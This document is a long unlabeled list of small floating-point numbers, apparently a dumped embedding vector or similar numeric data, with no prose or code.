-0.01491189282387495, -0.021905453875660896, -0.012823938392102718, 0.008207320235669613, -0.012614420615136623, -0.03918706625699997, -0.023061415180563927, 0.007094708736985922, 0.027208423241972923, -0.014579554088413715, -0.025994665920734406, 0.015562119893729687, 0.0008836777415126562, 0.030286168679594994, 0.040400825440883636, -0.0025991052389144897, 0.02248343452811241, -0.01859651692211628, 0.0036051522474735975, 0.021168529987335205, -0.019304543733596802, 0.018365325406193733, 0.024766456335783005, -0.032395798712968826, 0.009312707930803299, 0.018061885610222816, 0.00566420704126358, 0.021558666601777077, -0.010829905979335308, 0.020431604236364365, -0.006903252564370632, 0.004724989179521799, -0.03884027898311615, 0.03811780363321304, 0.006491441745311022, -0.01723826304078102, -0.029765985906124115, 0.036268264055252075, 0.021833207458257675, -0.0006709990557283163, -0.02778640389442444, 0.026890534907579422, -0.0005359864444471896, -0.0012453669914975762, -0.022627929225564003, 0.007607665844261646, -0.032771483063697815, 0.006032669451087713, 0.017122667282819748, 0.004132559522986412, 0.03545909374952316, 0.02160201407968998, -0.046758607029914856, -0.02519994229078293, 0.004139784257858992, 0.00754986796528101, 0.028393283486366272, -0.020128164440393448, 0.018712112680077553, 0.042943939566612244, 0.024304073303937912, 0.007405372802168131, 0.0021981315221637487, -0.0415278859436512, -0.035603586584329605, 0.012087013572454453, 0.008294017985463142, 0.009088740684092045, -0.015229781158268452, -0.012469925917685032, -0.009218785911798477, 0.007300613913685083, -0.017426107078790665, -0.011689651757478714, -0.016414640471339226, 0.0011893751798197627, -0.01078655757009983, -0.01322852447628975, -0.0007405373034998775, 0.014752947725355625, -0.04704760015010834, 0.006285536102950573, 0.026124710217118263, 0.008662479929625988, 0.023538248613476753, 0.010512017644941807, -0.008698604069650173, 0.007441496476531029, -0.017700647935271263, -0.0115885054692626, -0.016169000416994095, -0.036904044449329376, 0.0040639243088662624, -0.028335485607385635, 0.010056857950985432, -0.005006754770874977, 0.022425636649131775, -0.047105398029088974, 0.04785677045583725, -0.02478090673685074, -0.024275174364447594, -0.007354799658060074, -0.01335134543478489, 0.004258992616087198, 0.005573897622525692, -0.01765729859471321, 0.018365325406193733, 0.019839175045490265, -0.004143396392464638, -0.012245957739651203, 0.042105868458747864, -0.006545627024024725, -0.022281141951680183, -0.02139972150325775, -0.03303157538175583, 0.006422806531190872, 0.011689651757478714, 0.005205435212701559, -0.0027616622392088175, 0.018206380307674408, -0.01064206287264824, 0.004699702374637127, -0.043435223400592804, -0.0016878831665962934, -0.006653998512774706, -0.030806351453065872, 0.030719654634594917, -0.008048376068472862, -0.00011886977881658822, -0.020200412720441818, 0.02056165039539337, 0.01442060898989439, -0.013575312681496143, -0.013589762151241302, 0.03311827406287193, 0.029968280345201492, -0.005642532836645842, -0.03782881423830986, 0.022107748314738274, -0.012289307080209255, 0.013510290533304214, -0.02080729231238365, 0.005808702204376459, -0.0007093805470503867, 0.010035183280706406, -0.019521284848451614, -0.009059841744601727, 0.009876239113509655, 0.004573269281536341, -0.00626747403293848, 0.005483588203787804, 0.007925555109977722, 0.00766546418890357, 0.008900896646082401, 0.01025915052741766, -0.014485632069408894, -0.01936234161257744, -0.018119683489203453, 0.020128164440393448, -0.02681828662753105, -0.003933878615498543, -0.0034588510170578957, -0.016270145773887634, -0.0021186592057347298, -0.007940004579722881, 0.04068981483578682, 0.022454535588622093, 0.003615989349782467, 0.007578766904771328, -0.019521284848451614, 0.007033298257738352, 0.01438448578119278, 0.014709599316120148, 0.009117639623582363, 0.015056387521326542, -0.003709911135956645, 0.031095340847969055, -0.039909541606903076, 0.016905924305319786, 0.02352380007505417, 0.02660154365003109, 0.031557727605104446, -0.03545909374952316, -0.01632794365286827, -0.02069169655442238, 0.001055717235431075, 0.016111202538013458, 0.004042250104248524, 0.004352914169430733, -0.03467882052063942, 0.010569815523922443, -0.013647560030221939, -0.02051830105483532, -0.011978642083704472, 0.035921476781368256, -0.02069169655442238, 0.0033558981958776712, -0.02874007262289524, 0.00265690335072577, 0.030777452513575554, 0.0025575628969818354, -0.025040997192263603, 0.004031412769109011, 0.004609392955899239, -0.01022302731871605, -0.04381090775132179, -0.0035762533079832792, 0.004818911198526621, -0.02699168212711811, 0.03727973252534866, -0.03938936069607735, 0.01120559312403202, -0.00037591299042105675, -0.002481702947989106, -0.0017610337818041444, 0.02608136273920536, 0.0008100755512714386, 0.005660594906657934, 0.020287109538912773, -0.01827862858772278, 0.004266217350959778, 0.003693655598908663, -0.01817748136818409, -0.007383698597550392, -0.002261348068714142, -0.06906864792108536, 0.00042851822217926383, -0.017874041572213173, 0.030575159937143326, 0.01965133100748062, 0.031557727605104446, 0.008770851418375969, -0.01744055561721325, 0.012585521675646305, 0.0076943631283938885, -0.008806975558400154, -0.004183132667094469, 0.013488615863025188, 0.02069169655442238, 0.012860062532126904, -0.0008674220298416913, 0.030430663377046585, -0.02199215069413185, -0.03334946557879448, -0.02132747322320938, -0.016559137031435966, -0.031933411955833435, -0.004121722187846899, -0.01664583384990692, -0.005761741194874048, -0.0007373764528892934, 0.03167332336306572, 0.026384802535176277, 0.033060476183891296, -0.03563248738646507, 0.003009109990671277, 0.005624471232295036, -0.0038905299734324217, -0.017570601776242256, 0.016212347894906998, 0.017541702836751938, -0.012802264653146267, 0.0493595190346241, 0.014767397195100784, -0.006729858461767435, -0.0014377260813489556, 0.014348361641168594, 0.02167426235973835, 0.01810523308813572, -0.02482425421476364, 0.013438042253255844, -0.012643319554626942, -0.01898665353655815, -0.007723262067884207, 0.02002701908349991, -0.006805718410760164, 0.00766546418890357, -0.0258646197617054, 0.0037966081872582436, -0.014868543483316898, 0.02894236519932747, 0.02206439897418022, -0.006632324308156967, 0.006296372972428799, -0.007159731350839138, 0.001805285457521677, 0.003007303923368454, -0.05450354516506195, 0.006314435042440891, -0.04435998946428299, 0.003865243401378393, -0.019318992272019386, 0.011631853878498077, 0.021197428926825523, -0.038233399391174316, -0.03621046617627144, 0.03846459090709686, 0.03956275433301926, 0.011913619935512543, -0.019766926765441895, -0.04629622399806976, 0.008539658971130848, -0.007853307761251926, 0.008792526088654995, 0.014442283660173416, -0.0049995300360023975, -0.000911673647351563, -0.008265119045972824, 0.045776043087244034, 0.0011026781285181642, -0.0029657615814357996, 0.030401764437556267, 0.01731051132082939, -0.0076437899842858315, -0.008366265334188938, -0.0421636663377285, -0.020995134487748146, -0.0022776038385927677, -0.025329988449811935, 0.0019506836542859674, 0.008937020786106586, 0.01849536970257759, 0.005967646837234497, -0.005841213744133711, 0.0016960110515356064, -0.017455006018280983, 0.02118297852575779, -0.020532751455903053, -0.03404304012656212, 0.023162562400102615, -0.007463171146810055, 0.023061415180563927, -0.02384168840944767, 0.006198838818818331, -0.009356056340038776, 0.012946759350597858, 0.013250199146568775, -0.0019290093332529068, -0.026269206777215004, -0.010186903178691864, -0.02999717928469181, -0.030459562316536903, -0.013257423415780067, 0.014095495454967022, 0.013481390662491322, -0.012477150186896324, -0.02002701908349991, -0.0031933411955833435, -0.0017845142865553498, -0.0042373184114694595, 0.01849536970257759, -0.015749963000416756, 0.003052458632737398, -0.008106173947453499, -0.02265682816505432, -0.04253935068845749, -0.023552699014544487, 0.013503065332770348, -0.021211877465248108, -0.008590232580900192, -0.00846018735319376, 0.006321659777313471, 0.006700959522277117, 0.025980215519666672, -0.03164442256093025, -0.022714626044034958, 0.00229024700820446, 0.02785865217447281, -0.02132747322320938, -0.007629340514540672, -0.020720595493912697, -0.011472909711301327, 0.008886447176337242, 0.028263237327337265, 0.019636882469058037, 0.006314435042440891, 0.004681640770286322, 0.01075043436139822, -0.002801398281008005, -0.014406159520149231, -0.016457989811897278, 0.036412760615348816, -0.009558349847793579, 0.005544998683035374, 0.03282928094267845, -0.014102719724178314, -0.019954770803451538, -0.01684812642633915, -0.006668447982519865, 0.03288707882165909, -0.001328451675362885, -0.01842312328517437, -0.027295120060443878, 0.01692037470638752, 0.017960738390684128, -0.0337829515337944, 0.015793312340974808, 0.008294017985463142, 0.025561179965734482, -0.006578138563781977, 0.00205002399161458, 0.00458049401640892, -0.015229781158268452, -0.01559101976454258, 0.029881583526730537, -0.0159378070384264, -0.041238896548748016, -0.008785300888121128, -0.0010963564272969961, 0.001055717235431075, -0.018293077126145363, -0.011639079079031944, -0.025705674663186073, 0.010822681710124016, 0.028046496212482452, -0.028899015858769417, -0.017628399655222893, -0.035256799310445786, -0.012159260921180248, 0.027468515560030937, 0.019868073984980583, 0.0159378070384264, -0.02283022366464138, 0.0065131159499287605, -0.006115754134953022, 0.013112928718328476, -0.002543113427236676, 0.021370822563767433, 0.011089997366070747, -0.010020733810961246, 0.00512957526370883, 0.011162244714796543, 0.0023155335802584887, 0.004118110053241253, 0.012766140513122082, -0.008850323967635632, -0.00512235052883625, -0.04219256341457367, 0.027035029605031013, -0.018856607377529144, -0.009435528889298439, 0.02593686804175377, 0.03727973252534866, 0.0052487836219370365, -0.041932471096515656, -0.0036539193242788315, -0.014283338561654091, 0.02059054933488369, 0.014825195074081421, -0.015952257439494133, -0.008503535762429237, -0.017296060919761658, 0.02418847754597664, -0.001232723705470562, 0.050457682460546494, -0.015143084339797497, -0.0079689035192132, -0.010403646156191826, -0.002467253478243947, -0.029737086966633797, 0.0049995300360023975, -0.03638385981321335, -0.020850639790296555, -0.023307057097554207, 0.005241558887064457, -0.028147641569375992, -0.029621491208672523, 0.005180148873478174, -0.012520498596131802, 0.0006750629399903119, -0.0027959798462688923, 0.009334382601082325, 0.02369719371199608, 0.03647055849432945, -0.013625886291265488, -0.001892885542474687, 0.035748083144426346, -0.012975658290088177, 0.018654314801096916, 0.0043348525650799274, -0.02712172642350197, -0.025720125064253807, 0.004533533006906509, -0.005393278785049915, -0.007358412258327007, 0.013914876617491245, -0.0416145846247673, 0.012332655489444733, 0.007354799658060074, -0.0056389207020401955, 0.0005865597049705684, -0.012043665163218975, -0.02261348068714142, -0.01657358556985855, 0.011234492994844913, -0.004540757741779089, -0.0033288055565208197, -0.0234515517950058, 0.009572799317538738, 0.061092521995306015, -0.02122632786631584, -0.005830376408994198, -0.006621486973017454, 0.014196641743183136, 0.006419193930923939, 0.014608453027904034, 0.004948956426233053, -0.04028522968292236, 0.0019651330076158047, 0.007138057146221399, -0.007492070086300373, 0.00041000478086061776, 0.019738027825951576, 0.01533092837780714, -0.012202609330415726, -0.006997174117714167, -0.01470237411558628, 0.030430663377046585, -0.006924926768988371, 0.010230251587927341, 0.0004903801600448787, 0.014882992953062057, -0.02754076197743416, 0.03534349799156189, -0.002833909820765257, -0.004732213914394379, -0.030401764437556267, -0.01692037470638752, -0.007343962322920561, -0.022570131346583366, 0.012628870084881783, 0.005920685827732086, -0.012946759350597858, -0.010331397876143456, -0.00809172447770834, 0.012050889432430267, 0.006299985572695732, -0.01195696834474802, 0.0017890296876430511, 0.00011954710498685017, -0.00041226253961212933, -0.006639549043029547, -0.016270145773887634, -0.00040255425847135484, -0.022035500034689903, 0.013141827657818794, -0.010996075347065926, -0.026341453194618225, -0.0016517593758180737, 0.0017303286585956812, -0.011978642083704472, 0.013430817984044552, 0.002720119897276163, 0.001383540453389287, 0.03265588730573654, 0.009847340174019337, -0.008640806190669537, -0.026269206777215004, -0.01291786041110754, -0.014225540682673454, -0.0015822211280465126, -0.022714626044034958, -0.014081045985221863, 0.008900896646082401, 0.010288049466907978, -0.03103754296898842, 0.005819539539515972, 0.005516099743545055, 0.031760018318891525, 0.013683684170246124, 0.027699707075953484, -0.015721064060926437, -0.013344121165573597, 0.0027436004020273685, 0.01947793737053871, 0.01898665353655815, 0.03661505505442619, -0.022974718362092972, -0.0033035187516361475, 0.03719303384423256, 0.00898759439587593, 0.010020733810961246, 0.026876084506511688, -0.00592429842799902, 0.0373375304043293, -0.014781846664845943, -0.02293136902153492, -0.024910952895879745, -0.004829748068004847, -0.010670961812138557, 0.008857548236846924, -0.008481861092150211, 0.005346318241208792, 0.028566677123308182, 0.01307680457830429, 0.024520816281437874, 0.0013492228463292122, -0.0223100408911705, -0.01307680457830429, 0.013857078738510609, -0.010858805850148201, 0.01377038098871708, 0.004352914169430733, 0.002068085828796029, 0.008908121846616268, 0.007513744290918112, 0.005115125793963671, 0.005476363468915224, -0.027006130665540695, -0.049272824078798294, -0.01468070037662983, 0.007651014719158411, -0.009970160201191902, -0.018047435209155083, 0.020576098933815956, 0.005649757571518421, -0.0009049004293046892, 0.0012372391065582633, -0.025720125064253807, 0.0031481864862143993, -0.025546729564666748, 0.029173556715250015, -0.0016346005722880363, 0.010150779038667679, -0.005176536273211241, 0.006802105810493231, -0.008120623417198658, 0.03285818174481392, 0.029765985906124115, 0.04262604936957359, 0.014767397195100784, -0.00518376100808382, -0.024621961638331413, 0.02184765599668026, -0.033407263457775116, 0.01758505217730999, 0.005411340855062008, -0.006863516289740801, 0.0028718397952616215, -0.01755615323781967, 0.003998901229351759, 0.02967928908765316, 0.01211591251194477, -0.02118297852575779, -0.002944087376818061, 0.016732530668377876, -0.007394535932689905, 0.0127950394526124, 0.021067382767796516, 0.015721064060926437, -0.035921476781368256, 0.02489650249481201, 0.0285955760627985, -0.01076488383114338, 0.02366829477250576, 0.006838229950517416, -0.01116946991533041, 0.011097222566604614, 0.007716037333011627, -0.005534161813557148, 0.014514531008899212, 0.009262134321033955, -0.007181405555456877, -0.014984140172600746, 0.029231354594230652, 0.005837601143866777, -0.01622679829597473, -0.009471653029322624, -0.01657358556985855, 0.024043980985879898, 0.0036665627267211676, 0.00820009596645832, 0.020128164440393448, 0.0026153610087931156, -0.007195855025202036, -0.009847340174019337, 0.03502560779452324, 0.017397208139300346, -0.04435998946428299, -0.0012905217008665204, 0.0313265323638916, 0.020258210599422455, -0.01076488383114338, 0.009977385401725769, -0.025214390829205513, -0.012036439962685108, 0.013149052858352661, -0.005595571827143431, 0.012152036651968956, 0.01183414738625288, 0.0355168916285038, -0.018350875005126, -0.025286639109253883, 0.00464190449565649, -0.02569122612476349, -0.005003142170608044, -0.024564163759350777, 0.0035256799310445786, 0.005396891385316849, 0.0061193667352199554, -0.012845613062381744, -0.016631383448839188, 0.022815773263573647, 0.0047286017797887325, -0.028566677123308182, -0.0055305492132902145, -0.0020626673940569162, 0.006682897452265024, -0.016038954257965088, -0.010049632750451565, 0.017397208139300346, 0.00289712636731565, -0.012296531349420547, -0.01374148204922676, 0.0043745883740484715, -0.010699860751628876, -0.017035970464348793, 0.0058484384790062904, 0.010425319895148277, 0.00008963210711954162, 0.01412439439445734, 0.02027265913784504, 0.019622432067990303, -0.008503535762429237, 0.02926025353372097, 0.033898547291755676, -0.03985174372792244, -0.008792526088654995, 0.013835404068231583, -0.02080729231238365, -0.01050479244440794, -0.008070050738751888, 0.0018450216157361865, -0.0014512725174427032, -0.00008968854672275484, 0.0032276588026434183, 0.01141511183232069, 0.015403175726532936, -0.01940568909049034, 0.02268572710454464, -0.01129229087382555, -0.01478907186537981, 0.0016698213294148445, -0.004338464699685574, -0.00032353351707570255, -0.008749176748096943, -0.0072139170952141285, -0.006950213573873043, 0.029476996511220932, -0.014882992953062057, -0.0034498199820518494, -0.005837601143866777, 0.012173710390925407, -0.014724048785865307, 0.03002607822418213, 0.026803838089108467, -0.0037677092477679253, 0.029939381405711174, 0.0037821587175130844, 0.0008990303613245487, -0.025257740169763565, 0.0013925713719800115, 0.013965449295938015, -0.0007590507157146931, 0.04499576985836029, -0.006097692530602217, -0.017397208139300346, 0.008135072886943817, -0.007716037333011627, 0.010389196686446667, -0.006126591470092535, 0.01078655757009983, -0.017816243693232536, -0.005707555916160345, 0.004901995416730642, 0.0030849699396640062, -0.015027488581836224, -0.019217845052480698, 0.00652034068480134, -0.027150625362992287, 0.04014073312282562, 0.008192870765924454, -0.013531964272260666, 0.01171132642775774, -0.05323198810219765, -0.022107748314738274, -0.00032127578742802143, 0.010483117774128914, -0.018784360960125923, 0.006509503349661827, 0.0037677092477679253, -0.009760642424225807, -0.01667473278939724, 0.017050419002771378, 0.012296531349420547, -0.025604529306292534, 0.016486888751387596, -0.006979112513363361, 0.013423592783510685, 0.013416368514299393, 0.03687514364719391, 0.049590710550546646, -0.0003054716216865927, -0.0280031468719244, 0.01608230173587799, -0.024636412039399147, -0.014659025706350803, 0.023061415180563927, -0.012939534150063992, 0.019940320402383804, 0.004905608016997576, 0.006249412428587675, -0.00994848646223545, 0.0004818007873836905, -0.03618156909942627, -0.00029350564000196755, 0.008937020786106586, -0.005237946752458811, -0.0023751379922032356, -0.013221300207078457, 0.014752947725355625, -0.05201822891831398, -0.006137428805232048, -0.008561333641409874, 0.019810276105999947, 0.017527254298329353, -0.007513744290918112, -0.006029057316482067, -0.03933156281709671, 0.015041938051581383, 0.00023085347493179142, 0.03595037758350372, 0.010172453708946705, -0.0051909857429564, -0.005584734957665205, 0.011321189813315868, 0.01358253788203001, -0.006726245861500502, 0.009486102499067783, -0.03765541687607765, 0.035574689507484436, 0.006314435042440891, 0.02125522680580616, -0.000585656613111496, 0.007210304494947195, -0.005675044376403093, 0.011523482389748096, 0.00968117080628872, -0.010772108100354671, -0.005028428975492716, 0.005100676324218512, 0.004490184597671032, 0.012563847005367279, -0.002577431034296751, 0.006245799828320742, -0.004183132667094469, 0.01891440711915493, 0.02810429409146309, -0.01664583384990692, -0.003771321615204215, 0.009565574117004871, -0.002241479931399226, 0.012318206019699574, 0.008055601269006729, -0.0009356056689284742, 0.0028899016324430704, 0.02160201407968998, 0.01719491556286812, -0.0011460266541689634, -0.0023624945897608995, 0.018553167581558228, 0.01551877148449421, 0.00018998845189344138, 0.004219256341457367, -0.007188630290329456, 0.012087013572454453, -0.014044921845197678, -0.02443411760032177, 0.030893048271536827, 0.001837796764448285, -0.010035183280706406, -0.0031084504444152117, -0.018798809498548508, -0.026196958497166634, 0.0016923986840993166, -0.017122667282819748, 0.0048767090775072575, -0.009977385401725769, -0.02611026167869568, 0.004201194271445274, 0.007145281881093979, 0.01664583384990692, 0.009334382601082325, -0.005118738394230604, 0.01590890809893608, 0.003713523503392935, 0.011126121506094933, -0.031442128121852875, 0.0044359988532960415, 0.013373020105063915, 0.0018305720295757055, -0.002640647580847144, 0.012823938392102718, 0.010757658630609512, 0.019246743991971016, -0.002465447410941124, -0.002559369197115302, 0.020258210599422455, -0.005967646837234497, 0.030893048271536827, -0.004421549383550882, -0.0022848285734653473, -0.02904351055622101, -0.041759077459573746, 0.014955241233110428, -0.005104288924485445, 0.003814670257270336, 0.005360767710953951, -0.005964034702628851, -0.0014910086756572127, -0.007455946411937475, -0.024939851835370064, -0.025084346532821655, 0.02080729231238365, -0.018755462020635605, 0.005151249468326569, 0.0038110578898340464, -0.008344590663909912, -0.025113245472311974, -0.0033071311190724373, 0.008525209501385689, 0.01598115637898445, 0.011422336101531982, 0.018697664141654968, 0.01295398361980915, -0.04230815917253494, -0.02519994229078293, -0.013604211620986462, -0.00198861351236701, 0.022396737709641457, -0.02167426235973835, -0.015562119893729687, 0.0019308155169710517, -0.014709599316120148, -0.010656512342393398, -0.018899956718087196, 0.009738968685269356, -0.004598556086421013, 0.014341136440634727, 0.0180763341486454, 0.015966705977916718, 0.003464269684627652, 0.01608230173587799, 0.01171132642775774, -0.024564163759350777, 0.005393278785049915, 0.01800408773124218, -0.016111202538013458, 0.015027488581836224, -0.0020319621544331312, -0.011964192613959312, 0.025474483147263527, -0.0005084420554339886, 0.010497567243874073, 0.0047683375887572765, -0.001986807445064187, 0.016833677887916565, -0.0036665627267211676, -0.015475423075258732, 0.019550183787941933, -0.0011704101925715804, 0.010092981159687042, 0.003995289094746113, 0.00477195018902421, -0.021833207458257675, -0.032222405076026917, -0.019911421462893486, -0.00898759439587593, -0.021891005337238312, 0.012339879758656025, -0.00713083241134882, -0.0013320640427991748, 0.010143554769456387, -0.005548611283302307, -0.0007193145575001836, 0.004956181161105633, 0.005140412598848343, 0.009796766564249992, 0.007210304494947195, -0.019839175045490265, 0.007199467625468969, 0.008257893845438957, -0.007658239454030991, 0.012961208820343018, 0.013662010431289673, 0.008156747557222843, 0.0276852585375309, 0.0011812472948804498, -0.009565574117004871, 0.0019055289449170232, -0.004645517095923424, 0.008250669576227665, 0.00015363891725428402, 0.01389320194721222, -0.004836972802877426, -0.009803990833461285, 0.020359357818961143, -0.0001777966826921329, -0.021760959178209305, 0.0007974322070367634, -0.004591331351548433, -0.021211877465248108, 0.006260249298065901, 0.006758757401257753, 0.011198368854820728, -0.008698604069650173, -0.004370976239442825, -0.02911575883626938, -0.007091096136718988, 0.01650133915245533, 0.01550432201474905, -0.0010855193249881268, -0.0198969729244709, 0.0027038641273975372, 0.02369719371199608, 0.010042408481240273, 0.001267041196115315, -0.015880009159445763, -0.01080100703984499, -0.003944715950638056, 0.008640806190669537, -0.015865560621023178, -0.009710069745779037, -0.013676459901034832, 0.002450997708365321, 0.020879538729786873, -0.014579554088413715, 0.005906236357986927, -0.011653528548777103, 0.006173552479594946, -0.014608453027904034, -0.0005554029485210776, 0.0065636890940368176, 0.0005210853996686637, -0.0063794576562941074, -0.003092194674536586, -0.01772954687476158, -0.012896185740828514, 0.011386212892830372, -0.0003334675566293299, -0.015244231559336185, -0.008532434701919556, -0.026442600414156914, -0.0058484384790062904, 0.011624629609286785, 0.014644576236605644, -0.008366265334188938, 0.0003720748354680836, 0.005133187863975763, 0.002183681819587946, -0.0059495847672224045, 0.031095340847969055, 0.011024974286556244, 0.014940791763365269, 0.027381818741559982, -0.005162086803466082, -0.0009428304038010538, 0.005610021762549877, -0.016038954257965088, 0.011313964612782001, -0.00017734513676259667, 0.006570913828909397, 0.004295116290450096, 0.0022505109664052725, -0.010064082220196724, 0.019521284848451614, -0.00940662994980812, 0.005707555916160345, 0.010446994565427303, 0.01022302731871605, 0.011863046325743198, -0.0031265122815966606, 0.0038905299734324217, -0.000978051102720201, -0.035083405673503876, 0.017426107078790665, -0.009630597196519375, -0.014969690702855587, -0.0023299832828342915, 0.01905890181660652, 0.01905890181660652, -0.009059841744601727, -0.002693027025088668, -0.019116699695587158, -0.01751280389726162, -0.018582068383693695, -0.016616934910416603, 0.005519712343811989, -0.003122899914160371, 0.001044880016706884, 0.009897912852466106, -0.016949273645877838, -0.01225318294018507, 0.003388409735634923, 0.007307838648557663, 0.023119213059544563, -0.01088770478963852, -0.022714626044034958, -0.015562119893729687, 0.026789387688040733, -0.004891158547252417, -0.00048089769552461803, 0.0005694009596481919, 0.00030434277141466737, -0.003908591810613871, 0.0030777452047914267, -0.011899169534444809, -0.01417496707290411, -0.030632957816123962, 0.010916603729128838, 0.018683213740587234, -0.003785771084949374, 0.002991048153489828, -0.00014573683438356966, 0.015865560621023178, 0.007029685657471418, -0.023711642250418663, 0.019001103937625885, 0.00573284225538373, 0.014897443354129791, 0.0032005661632865667, 0.019102249294519424, 0.018061885610222816, -0.001972357975319028, 0.03921596333384514, -0.003661144059151411, -0.017137115821242332, 0.023754991590976715, -0.0034136963076889515, -0.021891005337238312, -0.005537773948162794, -0.0127950394526124, 0.006856291554868221, -0.012881736271083355, 0.017801793292164803, 0.035921476781368256, 0.006729858461767435, -0.012282081879675388, -0.0013871528208255768, 0.000268444768153131, 0.011191143654286861, 0.0009401211282238364, -0.0007278939592652023, -0.0039013673085719347, -0.007658239454030991, 0.003756872145459056, -0.01012188009917736, -0.0004908317350782454, 0.005414952989667654, 0.013495841063559055, 0.007976128719747066, -0.023220360279083252, 0.014131618663668633, 0.005111513659358025, 0.02160201407968998, -0.008604682050645351, 0.01876991055905819, 0.011783573776483536, 0.014608453027904034, -0.004916445352137089, -0.00006039442814653739, -0.015822211280465126, 0.03051736205816269, -0.008192870765924454, 0.0037604845128953457, 0.01361866109073162, 0.0004328079230617732, 0.012462700717151165, -0.0066720605827867985, 0.014724048785865307, -0.004620230291038752, 0.005776190664619207, 0.015721064060926437, -0.002481702947989106, -0.01744055561721325, -0.0004384522617328912, 0.00429150415584445, 0.0013248393079265952, 0.01692037470638752, 0.008070050738751888, -0.012209834530949593, 0.003437176812440157, -0.0063902949914336205, -0.003216821700334549, -0.03421643376350403, -0.011126121506094933, 0.009637822397053242, 0.002994660520926118, 0.010699860751628876, -0.0038941423408687115, -0.006227738223969936, 0.01832197606563568, 0.017888491973280907, -0.0014503693673759699, 0.002732763299718499, 0.00573284225538373, -0.002848359290510416, 0.016284596174955368, -0.00117763492744416, 0.022049948573112488, -0.017382757738232613, -0.001677046064287424, -0.01468070037662983, -0.005451077129691839, 0.02795979753136635, 0.003406471572816372, -0.0025232452899217606, 0.0024275174364447594, 0.0078316330909729, 0.009478877298533916, -0.0007107351557351649, 0.027295120060443878, -0.0073728617280721664, 0.008698604069650173, -0.002422098768875003, -0.011357313022017479, -0.020229311659932137, -0.02002701908349991, -0.012166486121714115, 0.0007748548523522913, 0.012520498596131802, 0.026384802535176277, -0.0023498511873185635, -0.000020009181753266603, -0.009738968685269356, -0.0005639823502860963, -0.01625569723546505, -0.01384262926876545, 0.007940004579722881, 0.017469454556703568, 0.001010562526062131, -0.0029747923836112022, -0.0051982104778289795, 0.002483509248122573, 0.01817748136818409, -0.03147102892398834, 0.0033306116238236427, -0.013943775556981564, 0.014969690702855587, -0.004782787058502436, 0.007015236187726259, -0.011350088752806187, -0.0035076180938631296, 0.0047286017797887325, -0.008749176748096943, -0.004555207677185535, -0.004240930546075106, -0.001399796106852591, -0.01940568909049034, 0.0008809684659354389, 0.028407733887434006, 0.024694209918379784, 0.019535735249519348, 0.006383070256561041, 0.000011091125998063944, -0.0019524898380041122, -0.004862259607762098, -0.01375593151897192, -0.01968022994697094, 0.0031572175212204456, -0.0009816634701564908, 0.03462102264165878, 0.0026803838554769754, -0.006971887778490782, -0.028436632826924324, 0.011371762491762638, -0.010620388202369213, 0.007221141830086708, -0.014225540682673454, -0.012527723796665668, 0.0025268576573580503, -0.012838387861847878, 0.018972204998135567, 0.019709128886461258, 0.005064552649855614, -0.004591331351548433, 0.007058584596961737, 0.003807445289567113, -0.013517514802515507, 0.009319933131337166, 0.00928380899131298, -0.012751691043376923, -0.00343898287974298, -0.006635936442762613, 0.007788284681737423, -0.005613633897155523, 0.012780589982867241, 0.0044468361884355545, -0.025922417640686035, -0.0009934037225320935, -0.021414171904325485, -0.0075859916396439075, 0.014687924645841122, 0.007138057146221399, 0.016761429607868195, -0.0059495847672224045, 0.01280948892235756, 0.00016831418906804174, 0.00009177695756079629, -0.021630913019180298, 0.005776190664619207, -0.04115219786763191, 0.004240930546075106, 0.004251767881214619, -0.011537931859493256, -0.017917390912771225, 0.007911105640232563, 0.02967928908765316, -0.01142956130206585, -0.00912486482411623, -0.0024925400502979755, 0.0031879227608442307, -0.013098479248583317, 0.003326999256387353, -0.011581281200051308, 0.005364379845559597, -0.005852050613611937, 0.004313178360462189, 0.0015397757524624467, 0.005945972632616758, -0.013575312681496143, 0.008640806190669537, -0.0033866034355014563, 0.0012697505299001932, -0.00687074102461338, 0.006086855195462704, -0.02519994229078293, -0.021977702155709267, 0.019318992272019386, -0.03152882680296898, -0.007976128719747066, 0.01183414738625288, -0.009211561642587185, 0.005194598343223333, -0.010605938732624054, 0.0117257758975029, 0.004273442085832357, 0.005256008822470903, -0.014955241233110428, 0.0029675676487386227, 0.0025846557691693306, -0.024029532447457314, 0.008908121846616268, 0.03138433024287224, -0.005042878445237875, -0.008033926598727703, -0.022700177505612373, -0.018509820103645325, -0.007242816034704447, 0.02111073210835457, 0.01076488383114338, -0.00032579124672338367, -0.02544558420777321, -0.005064552649855614, -0.009984610602259636, -0.006979112513363361, 0.003832732094451785, -0.02478090673685074, -0.01751280389726162, -0.0014765590894967318, -0.015706615522503853, 0.002720119897276163, 0.024910952895879745, -0.015070836991071701, -0.002851971657946706, -0.002178263384848833, -0.004136171657592058, -0.0036990740336477757, 0.01731051132082939, 0.010548140853643417, 0.0006335205980576575, -0.016660282388329506, -0.01237600389868021, 0.015619918704032898, -0.014594003558158875, -0.002440160606056452, 0.007369249127805233, -0.00984011497348547, -0.0057400669902563095, -0.00585566321387887, 0.004529920872300863, -0.0070441351272165775, 0.02911575883626938, 0.02628365531563759, 0.002992854453623295, 0.002541307359933853, 0.00807727500796318, 0.004533533006906509, 0.005032041110098362, 0.007181405555456877, -0.00470331497490406, 0.007166956085711718, 0.014572328887879848, 0.00754264323040843, 0.0041036601178348064, -0.019290093332529068, -0.02849443070590496, -0.018899956718087196, -0.00198861351236701, -0.00598570890724659, 0.00403863750398159, -0.005945972632616758, 0.0024925400502979755, 0.01842312328517437, -0.0034136963076889515, -0.036730650812387466, -0.009760642424225807, -0.0007062196964398026, 0.004085598513484001, 0.029448097571730614, -0.002732763299718499, 0.015287579968571663, -0.0034173086751252413, 0.020055918022990227, -0.001927203149534762, 0.012087013572454453, -0.02108183316886425, -0.021891005337238312, -0.011935293674468994, 0.011653528548777103, 0.010735984891653061, 0.013575312681496143, 0.01863986626267433, -0.043435223400592804, -0.000055258078646147624, 0.01213036198168993, -0.008084500208497047, -0.014586778357625008, 0.003630438819527626, -0.018452022224664688, -0.006607037503272295, 0.005913461092859507, -0.019318992272019386, -0.0349678099155426, -0.030459562316536903, -0.0015289385337382555, 0.0011216431157663465, -0.000017229345758096315, -0.008828649297356606, -0.00002648606096045114, 0.004136171657592058, -0.031413231045007706, -0.008250669576227665, -0.01863986626267433, 0.0029260253068059683, -0.0074125975370407104, -0.005761741194874048, 0.009724519215524197, -0.027815302833914757, -0.021934352815151215, -0.010526467114686966, 0.01849536970257759, 0.005440239794552326, -0.006585363298654556, -0.012137587182223797, -0.04603613168001175, -0.010555366054177284, -0.015721064060926437, 0.019145598635077477, 0.004255380015820265, -0.010100206360220909, -0.008055601269006729, -0.01333689596503973, -0.01307680457830429, -0.004208419471979141, -0.008973144926130772, -0.020951787009835243, 0.0038941423408687115, 